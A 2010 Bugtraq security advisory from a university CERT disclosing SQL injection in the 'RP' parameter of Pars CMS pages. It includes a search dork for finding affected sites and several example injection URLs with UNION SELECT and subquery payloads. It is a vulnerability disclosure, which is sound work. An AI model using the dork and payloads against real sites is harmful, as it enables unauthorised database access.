[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Pars CMS SQL Injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Pars CMS SQL Injection Vulnerability
- From: faghani@xxxxxxx
- Date: 15 Mar 2010 12:01:07 -0000
================= IUT-CERT =================
Title: Pars CMS SQL Injection Vulnerability
Vendor: www.parscms.com
Dork: Design by Virtual Develop Co
Type: Input.Validation.Vulnerability (SQL Injection)
Fix: N/A
================== nsec.ir =================
Description:
------------------
Pars CMS is a CMS producer in Iran. "fa_default.asp" and "en_default.asp" pages
in Pars CMS
product are vulnerable to SQL Injection vulnerability.
Vulnerability Variant:
------------------
Injection "fa_default.asp","en_default.asp" in "RP" parameter.
http://www.example.com/fa_default.asp?RP='
http://www.example.com/fa_default.asp?RP=\'
http://www.example.com/fa_default.asp?RP=UNION SELECT 1,1,1 FROM validtblname%00
http://www.example.com/fa_default.asp?RP=' AND (SELECT TOP 1 'someData' FROM
validTableName)%00
http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM
validTableName%00
Solution:
------------------
Input validation of Parameter "RP" should be corrected.
Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari